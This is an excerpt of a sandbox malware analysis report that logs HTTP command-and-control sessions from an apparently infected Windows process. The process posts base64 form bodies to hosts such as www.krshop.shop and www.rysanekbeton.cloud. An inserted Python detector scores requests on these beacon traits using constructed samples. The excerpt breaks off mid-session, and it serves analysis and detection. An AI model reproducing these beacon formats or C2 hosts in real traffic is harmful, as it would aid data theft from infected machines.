                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 54 52 41 54 4f 20 2d 20 44 6f 6d 61 69 6e 20 72 65 73 65 72 76 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 4f 70 65 6e 20 53 61 6e 73 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 22 3e 0d 0a 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 33 66 33 66 33 3b 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 20 30 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html> <head> <title>STRATO - Domain reserved</title> </head> <body style="background-color: #fff; font-family: Open Sans, sans-serif; padding: 0; margin: 0;"> <div style="background-color: #f3f3f3; padding: 40px 0; width: 100%;"> <div style="width: 150px; margin-left: auto; margin-right: auto;"><a href="https://www.strato.de" rel="nofollow" style="border: 0;"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 157.4 33.7"><defs><style>.a{fill:#f80;}.b{fill:#f80;}</style></defs><title>STRATO</title><path class="a" d="M17.8,7a4.69,4.69,0,0,1-4.7-4.7H29.6A4.69,4.69,0,0,1,34.3,7V23.5a4.69,4.69,0,0,1-4.7-4.7V9.4A2.37,2.37,0,0,0,27.2,7Z" transform="translate(-1.3 -2.3)"/><path class="b" d="M57.7,32.9c-1.3,2.5-4.7,2.6-7.3,2.6-2.1,0-4-.1-5.2-.2-1.5-.1-1.8-.5-1.8-1.3V32.9c0-1.3.2-1.7,1.4-1.7,2.1,0,3.1.2,6.2.2,2.4,0,2.9-.2,2.9-2.3,0-2.4,0-2.5-1.3-3.1a42.2,42.2,0,0,0-4.5-1.8c-3.7-1.6-4.4-2.3-4.4-6.5,0-2.6.5-4.8,3.4-5.7a14,14,0,0,1,4.9-.6c1.6, [TRUNCATED]
                                                                                  Dec 9, 2024 06:59:27.583761930 CET | 1236 | IN | Data Raw: 33 2c 30 2c 31 2e 36 2c 31 2e 33 2c 32 2e 31 2e 39 2e 35 2c 32 2c 2e 38 2c 32 2e 39 2c 31 2e 33 2c 34 2e 39 2c 32 2e 31 2c 36 2c 32 2e 35 2c 36 2c 36 2e 37 61 31 30 2e 31 32 2c 31 30 2e 31 32 2c 30 2c 30 2c 31 2d 2e 36 2c 34 2e 38 4d 37 37 2e 31
                                                                                  Data Ascii: 3,0,1.6,1.3,2.1.9.5,2,.8,2.9,1.3,4.9,2.1,6,2.5,6,6.7a10.12,10.12,0,0,1-.6,4.8M77.1,15.7c-2.1,0-3.7,0-5.2-.1v18a1.4,1.4,0,0,1-1.5,1.6H69c-1.1,0-1.7-.3-1.7-1.6V15.7c-1.5,0-3.2.1-5.3.1-1.5,0-1.5-.9-1.5-1.6v-.9A1.36,1.36,0,0,1,62,11.8H77.2c.8,0,1.
                                                                                  Dec 9, 2024 06:59:27.583775043 CET | 448 | IN | Data Raw: 35 73 2d 2e 36 2c 37 2e 31 2d 32 2e 36 2c 39 2e 35 4d 31 35 33 2c 31 37 2e 34 63 2d 2e 38 2d 31 2e 36 2d 32 2e 34 2d 32 2e 33 2d 34 2e 34 2d 32 2e 33 73 2d 33 2e 36 2e 36 2d 34 2e 34 2c 32 2e 33 63 2d 2e 37 2c 31 2e 35 2d 2e 38 2c 34 2e 34 2d 2e
                                                                                  Data Ascii: 5s-.6,7.1-2.6,9.5M153,17.4c-.8-1.6-2.4-2.3-4.4-2.3s-3.6.6-4.4,2.3c-.7,1.5-.8,4.4-.8,6.1s.1,4.6.8,6.1,2.4,2.3,4.4,2.3,3.6-.7,4.4-2.3.8-4.2.8-6.1-.1-4.6-.8-6.1" transform="translate(-1.3 -2.3)"/><path class="a" d="M24.9,14a2.26,2.26,0,0,0-2.3-2.
                                                                                  Dec 9, 2024 06:59:27.583853006 CET | 1236 | IN | Data Raw: 6f 6c 6f 72 3a 23 33 33 33 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 30 63 68 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b
                                                                                  Data Ascii: olor:#333;font-size: 18px; max-width: 60ch; margin-left: auto; margin-right: auto; padding: 60px 24px;"> <div style="padding-bottom: 30px" lang="en"><span style="font-size: 14px; color: #777; font-weight: bold;">English</s
                                                                                  Dec 9, 2024 06:59:27.583865881 CET | 527 | IN | Data Raw: 2e 3c 2f 64 69 76 3e 0d 0a 20 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 22 20 6c 61 6e 67 3d 22 69 74 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34
                                                                                  Data Ascii: .</div> <div style="padding-bottom: 30px" lang="it"><span style="font-size: 14px; color: #777; font-weight: bold;">Italiano</span><br>Questo sito web &egrave; appena stato attivato. Ancora non c&#39;&egrave; contenuto.</div> </div>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  33 | 192.168.2.7 | 50010 | 13.248.169.48 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:59:33.156054020 CET | 823 | OUT | POST /5p01/ HTTP/1.1
                                                                                  Host: www.krshop.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.krshop.shop
                                                                                  Referer: http://www.krshop.shop/5p01/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 74 43 53 7a 48 56 39 53 45 61 5a 74 63 4a 52 44 32 48 6f 6e 75 76 61 33 57 38 35 6a 67 69 4c 30 7a 4f 2b 50 53 37 30 4c 4a 4c 65 4f 31 32 63 41 73 34 57 67 67 49 6f 75 6c 36 4f 67 47 74 31 64 78 64 64 6f 43 58 61 47 49 45 33 70 5a 33 31 4f 37 69 33 66 6b 54 58 7a 4f 6c 52 49 62 57 62 71 4b 4b 6f 44 65 31 31 35 50 41 64 45 6c 62 4d 58 66 4c 51 61 59 38 39 77 79 6d 59 6f 2f 52 6a 33 71 6f 47 54 4f 6d 63 49 75 35 53 6f 42 57 5a 77 76 57 48 45 36 6a 57 35 55 73 42 39 34 34 64 7a 50 33 4e 64 44 53 55 48 66 38 75 36 73 74 65 48 67 46 39 6e 46 31 42 30 6b 6d 65 41 2f 55 46 4b 35 68 78 71 78 34 74 51 79 75 33 52 4e 78 75 33 75 41 3d 3d
                                                                                  Data Ascii: PHM8hj-=tCSzHV9SEaZtcJRD2Honuva3W85jgiL0zO+PS70LJLeO12cAs4WggIoul6OgGt1dxddoCXaGIE3pZ31O7i3fkTXzOlRIbWbqKKoDe115PAdElbMXfLQaY89wymYo/Rj3qoGTOmcIu5SoBWZwvWHE6jW5UsB944dzP3NdDSUHf8u6steHgF9nF1B0kmeA/UFK5hxqx4tQyu3RNxu3uA==
                                                                                  Dec 9, 2024 06:59:34.246535063 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                  content-length: 0
                                                                                  connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  34 | 192.168.2.7 | 50011 | 13.248.169.48 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:59:35.816483021 CET | 843 | OUT | POST /5p01/ HTTP/1.1
                                                                                  Host: www.krshop.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.krshop.shop
                                                                                  Referer: http://www.krshop.shop/5p01/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 74 43 53 7a 48 56 39 53 45 61 5a 74 64 74 74 44 30 6d 6f 6e 6f 50 61 32 49 73 35 6a 71 43 4c 77 7a 4f 69 50 53 35 5a 51 4a 2b 32 4f 31 53 4d 41 74 39 36 67 74 6f 6f 75 77 4b 4f 6c 62 64 31 6f 78 64 52 61 43 54 61 47 49 45 54 70 5a 31 39 4f 6e 44 33 63 6c 44 58 6d 61 56 52 4b 66 57 62 71 4b 4b 6f 44 65 30 52 54 50 45 35 45 6d 71 63 58 65 75 38 5a 45 4d 39 33 6b 32 59 6f 6f 42 6a 37 71 6f 48 70 4f 6c 5a 41 75 36 36 6f 42 54 6c 77 73 48 48 44 31 6a 57 37 65 4d 41 42 72 39 45 4b 4a 30 56 4f 4e 30 6b 6f 58 63 2b 53 67 37 66 6c 36 6e 78 4c 62 6b 35 50 67 6b 36 32 6f 79 59 2f 37 67 31 79 38 61 5a 78 74 5a 53 37 41 6a 50 7a 34 2b 67 4c 58 34 78 4b 31 45 6c 2f 49 4e 70 57 45 71 42 30 67 56 4d 3d
                                                                                  Data Ascii: PHM8hj-=tCSzHV9SEaZtdttD0monoPa2Is5jqCLwzOiPS5ZQJ+2O1SMAt96gtoouwKOlbd1oxdRaCTaGIETpZ19OnD3clDXmaVRKfWbqKKoDe0RTPE5EmqcXeu8ZEM93k2YooBj7qoHpOlZAu66oBTlwsHHD1jW7eMABr9EKJ0VON0koXc+Sg7fl6nxLbk5Pgk62oyY/7g1y8aZxtZS7AjPz4+gLX4xK1El/INpWEqB0gVM=
                                                                                  Dec 9, 2024 06:59:36.899353981 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                  content-length: 0
                                                                                  connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  35 | 192.168.2.7 | 50012 | 13.248.169.48 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:59:38.482201099 CET | 1856 | OUT | POST /5p01/ HTTP/1.1
                                                                                  Host: www.krshop.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.krshop.shop
                                                                                  Referer: http://www.krshop.shop/5p01/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 74 43 53 7a 48 56 39 53 45 61 5a 74 64 74 74 44 30 6d 6f 6e 6f 50 61 32 49 73 35 6a 71 43 4c 77 7a 4f 69 50 53 35 5a 51 4a 34 75 4f 32 6c 6b 41 73 61 4f 67 73 6f 6f 75 73 61 4f 6b 62 64 31 31 78 64 35 65 43 54 66 6b 49 43 58 70 5a 58 46 4f 72 68 54 63 72 44 58 6d 59 56 52 48 62 57 61 79 4b 4b 34 48 65 30 42 54 50 45 35 45 6d 6f 30 58 64 37 51 5a 58 63 39 77 79 6d 59 53 2f 52 69 53 71 73 53 4c 4f 6d 31 51 75 72 61 6f 43 7a 56 77 74 31 2f 44 38 6a 57 6c 64 4d 41 5a 72 39 41 72 4a 33 78 38 4e 77 73 43 58 61 4f 53 6a 2f 79 68 2f 54 35 31 4b 33 70 45 69 58 4b 58 67 55 63 6f 35 41 77 45 78 4a 31 32 67 6f 47 48 50 7a 6e 42 78 37 56 77 42 62 70 35 77 48 78 45 46 64 38 47 62 4a 46 41 7a 67 6b 76 54 75 78 4a 41 4d 50 77 36 63 4e 59 4f 77 42 64 61 4a 53 63 64 77 6a 32 47 58 6b 5a 2f 48 67 76 34 43 7a 4d 35 52 48 2b 6a 53 51 42 51 6a 4c 69 68 66 35 49 6f 41 4a 67 64 34 54 71 74 48 61 37 44 39 53 4c 48 2f 52 41 70 55 66 49 62 4d 55 2b 48 4c 77 42 6f 67 52 61 76 6d 69 32 57 65 64 34 2b 69 [TRUNCATED]
                                                                                  Data Ascii: PHM8hj-= [TRUNCATED]
                                                                                  Dec 9, 2024 06:59:39.563843012 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                  content-length: 0
                                                                                  connection: close


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  36 | 192.168.2.7 | 50013 | 13.248.169.48 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:59:41.140810966 CET | 558 | OUT | GET /5p01/?PHM8hj-=gA6TElZrCKVvAudK23F9jNDYdfN6rlDKrsL6QppRHZfK3DYPsJvxm5gqg5Wra8oJ+dNxCku7PXatRX1MrBH30S65OjFWUkDmOoMpCFx3AEVSn7FxR5wufZcQu20w9g7Qi9GQUVJhypaN&tHfx=9byl HTTP/1.1
                                                                                  Host: www.krshop.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:59:42.232922077 CET | 394 | IN | HTTP/1.1 200 OK
                                                                                  content-type: text/html
                                                                                  date: Mon, 09 Dec 2024 05:59:42 GMT
                                                                                  content-length: 273
                                                                                  connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 50 48 4d 38 68 6a 2d 3d 67 41 36 54 45 6c 5a 72 43 4b 56 76 41 75 64 4b 32 33 46 39 6a 4e 44 59 64 66 4e 36 72 6c 44 4b 72 73 4c 36 51 70 70 52 48 5a 66 4b 33 44 59 50 73 4a 76 78 6d 35 67 71 67 35 57 72 61 38 6f 4a 2b 64 4e 78 43 6b 75 37 50 58 61 74 52 58 31 4d 72 42 48 33 30 53 36 35 4f 6a 46 57 55 6b 44 6d 4f 6f 4d 70 43 46 78 33 41 45 56 53 6e 37 46 78 52 35 77 75 66 5a 63 51 75 32 30 77 39 67 37 51 69 39 47 51 55 56 4a 68 79 70 61 4e 26 74 48 66 78 3d 39 62 79 6c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?PHM8hj-=gA6TElZrCKVvAudK23F9jNDYdfN6rlDKrsL6QppRHZfK3DYPsJvxm5gqg5Wra8oJ+dNxCku7PXatRX1MrBH30S65OjFWUkDmOoMpCFx3AEVSn7FxR5wufZcQu20w9g7Qi9GQUVJhypaN&tHfx=9byl"}</script></head></html>
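
The sessions recorded above share one request shape regardless of which host is contacted: the same Android WebView User-Agent on every request from a Windows process, Origin and Referer headers that point back at the request's own host and path, a single short form key (PHM8hj-) whose value is a long base64-looking blob in both the POST bodies and the GET query strings, and the same Content-Length sequence of 220, 240 and 1252 bytes for the three POSTs to each host. The Python below is an added example and is not part of the Joe Sandbox report: it parses raw HTTP requests of this kind and scores them on exactly those traits, then checks per host for the 220/240/1252 POST triple. The indicators, the length threshold of 100 and the key/value regexes are heuristics derived from this report's traffic alone, not a general FormBook signature. The sample traffic is constructed: the GET request line, hosts and paths are copied from the sessions on this page, the POST bodies are synthetic base64 padded to the observed Content-Length values, and the benign control request (host intranet.example, a desktop Firefox User-Agent) is invented. It runs offline and contacts nothing.

```python
"""Added example, not from the Joe Sandbox report: parse raw HTTP requests like
the sessions above and flag the beacon traits they share. Sample traffic is
constructed (GET line, hosts and paths copied from this page; POST bodies are
synthetic base64 of the observed Content-Length; intranet.example is invented)."""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List

# The one User-Agent on every request above; an Android WebView UA from a Windows host.
OBSERVED_UA = ("Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) "
               "AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 "
               "Chrome/44.0.2403.117 Mobile Safari/537.36")
OBSERVED_POST_SIZES = [220, 240, 1252]   # Content-Length triple sent to each host above
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{100,}={0,2}")   # long base64-looking blob
FORM_KEY_RE = re.compile(r"[A-Za-z0-9]{4,8}-?")        # e.g. "PHM8hj-", "tHfx"

@dataclass
class HttpRequest:
    method: str
    path: str
    headers: Dict[str, str]   # header names lower-cased
    body: str

def parse_request(raw: str) -> HttpRequest:
    """Split one raw HTTP/1.1 request (CRLF or LF endings) into its parts."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.strip("\n").split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)

def _has_blob_param(pairs: List[str]) -> bool:
    """A short alphanumeric key carrying a long base64 value, e.g. PHM8hj-=..."""
    return any(FORM_KEY_RE.fullmatch(k) and BASE64_RE.fullmatch(v)
               for k, _, v in (p.partition("=") for p in pairs))

def beacon_indicators(req: HttpRequest) -> List[str]:
    """Traits of one request that match the C2 traffic in this report."""
    hits, h = [], req.headers
    if h.get("user-agent") == OBSERVED_UA:
        hits.append("android-webview-ua-from-windows-host")
    # Origin/Referer name the request's own host and path: the POST poses as a
    # form submitted from the very page it is posting to.
    origin = h.get("origin", "")
    if origin == f"http://{h.get('host')}" and h.get("referer") == origin + req.path:
        hits.append("self-referencing-origin-and-referer")
    if req.method == "POST" and h.get("content-type") == \
            "application/x-www-form-urlencoded" and _has_blob_param([req.body]):
        hits.append("single-key-base64-form-body")
    elif req.method == "GET" and "?" in req.path and \
            _has_blob_param(req.path.split("?", 1)[1].split("&")):
        hits.append("base64-blob-in-query")
    return hits

def is_suspected_beacon(req: HttpRequest) -> bool:
    """Each trait is weak alone (self-posting forms are common): require two."""
    return len(beacon_indicators(req)) >= 2

def post_size_sequences(reqs: List[HttpRequest]) -> Dict[str, List[int]]:
    """Content-Length of POSTs per host, in the order they were sent."""
    seq: Dict[str, List[int]] = {}
    for r in reqs:
        if r.method == "POST" and "content-length" in r.headers:
            seq.setdefault(r.headers["host"], []).append(int(r.headers["content-length"]))
    return seq

def hosts_with_observed_sequence(reqs: List[HttpRequest]) -> List[str]:
    """Hosts that received the 220/240/1252 POST triple seen above."""
    return [h for h, s in post_size_sequences(reqs).items()
            if any(s[i:i + 3] == OBSERVED_POST_SIZES for i in range(len(s) - 2))]

def _c2_post(host: str, path: str, content_length: int) -> str:
    """Constructed POST shaped like sessions 33-35 and 37-39; synthetic body of exact length."""
    n_raw = ((content_length - len("PHM8hj-=")) // 4) * 3
    body = "PHM8hj-=" + base64.b64encode(bytes(i % 251 for i in range(n_raw))).decode()
    return (f"POST {path} HTTP/1.1\r\nHost: {host}\r\nOrigin: http://{host}\r\n"
            f"Referer: http://{host}{path}\r\nContent-Length: {len(body)}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\nConnection: close\r\n"
            f"User-Agent: {OBSERVED_UA}\r\n\r\n{body}")

SAMPLE_REQUESTS = [
    "GET /8mom/?tHfx=9byl&PHM8hj-=v3XpYZPN786X74uq5rH/tUlQYCSKKJswOZfu2m4ZpmP7p96"
    "MXgDDjg6tIOsL1UDqFEVhH3VxTleyM0zNBIvLkhe6iRJHcqM7Dhz4vbv1gsAxBWEBkrF+OsuoFL7"
    "bmmLpMN9zG59B7XRp HTTP/1.1\r\nHost: www.carsten.studio\r\nConnection: close\r\n"
    f"User-Agent: {OBSERVED_UA}\r\n\r\n",                        # session 32 above
    _c2_post("www.krshop.shop", "/5p01/", 220),
    _c2_post("www.krshop.shop", "/5p01/", 240),
    _c2_post("www.krshop.shop", "/5p01/", 1252),
    _c2_post("www.rysanekbeton.cloud", "/k6bb/", 220),
    _c2_post("www.rysanekbeton.cloud", "/k6bb/", 240),
    "POST /login HTTP/1.1\r\nHost: intranet.example\r\nOrigin: https://intranet.example"
    "\r\nReferer: https://intranet.example/login\r\nContent-Length: 23\r\nContent-Type: "
    "application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; "
    "Win64; x64) Firefox/133.0\r\n\r\nuser=alice&remember=yes",   # invented control
]
```

Parse `SAMPLE_REQUESTS` with `parse_request`, feed each result to `beacon_indicators` or `is_suspected_beacon`, and pass the whole list to `hosts_with_observed_sequence`. The code keys on request shape rather than on literal paths because the per-host paths differ (/8mom/, /5p01/, /k6bb/) while the parameter names and body sizes stay the same across all three hosts in this run. Note that the servers in this capture answered with a registrar parking page, 405s and 404s, so nothing on the response side is usable for matching; the request side is what a detection has to key on.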


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  37 | 192.168.2.7 | 50014 | 81.2.196.19 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:59:53.030214071 CET | 844 | OUT | POST /k6bb/ HTTP/1.1
                                                                                  Host: www.rysanekbeton.cloud
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.rysanekbeton.cloud
                                                                                  Referer: http://www.rysanekbeton.cloud/k6bb/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 55 34 67 37 36 62 36 70 55 79 46 70 70 63 32 31 76 4b 55 71 36 35 63 48 38 52 53 4e 75 69 4f 4e 34 33 46 7a 55 4f 71 4c 2f 72 6a 2f 48 4e 33 61 65 50 73 73 6f 73 2f 75 74 6a 2f 78 34 33 36 51 57 71 4e 47 38 46 55 52 6e 39 6e 57 74 36 4f 79 57 43 54 44 37 36 38 55 56 61 41 55 7a 39 78 4d 43 6d 30 42 55 66 50 55 45 4d 4c 6e 6f 51 65 57 31 56 63 4b 32 6b 63 42 62 53 51 31 6f 58 73 45 77 43 6c 4d 64 6f 49 39 6f 69 52 53 4e 63 6b 55 55 32 53 4a 56 58 55 77 32 4c 4d 59 66 54 6e 74 47 6d 4a 61 53 5a 46 36 61 74 78 31 2f 32 56 74 56 39 54 36 7a 52 48 69 79 30 57 55 57 61 4f 73 34 31 65 50 68 2b 58 32 66 31 68 49 65 33 43 4a 62 77 3d 3d
                                                                                  Data Ascii: PHM8hj-=U4g76b6pUyFppc21vKUq65cH8RSNuiON43FzUOqL/rj/HN3aePssos/utj/x436QWqNG8FURn9nWt6OyWCTD768UVaAUz9xMCm0BUfPUEMLnoQeW1VcK2kcBbSQ1oXsEwClMdoI9oiRSNckUU2SJVXUw2LMYfTntGmJaSZF6atx1/2VtV9T6zRHiy0WUWaOs41ePh+X2f1hIe3CJbw==
                                                                                  Dec 9, 2024 06:59:54.311187983 CET | 355 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 09 Dec 2024 05:59:54 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  38 | 192.168.2.7 | 50015 | 81.2.196.19 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 06:59:55.692626953 CET | 864 | OUT | POST /k6bb/ HTTP/1.1
                                                                                  Host: www.rysanekbeton.cloud
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.rysanekbeton.cloud
                                                                                  Referer: http://www.rysanekbeton.cloud/k6bb/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
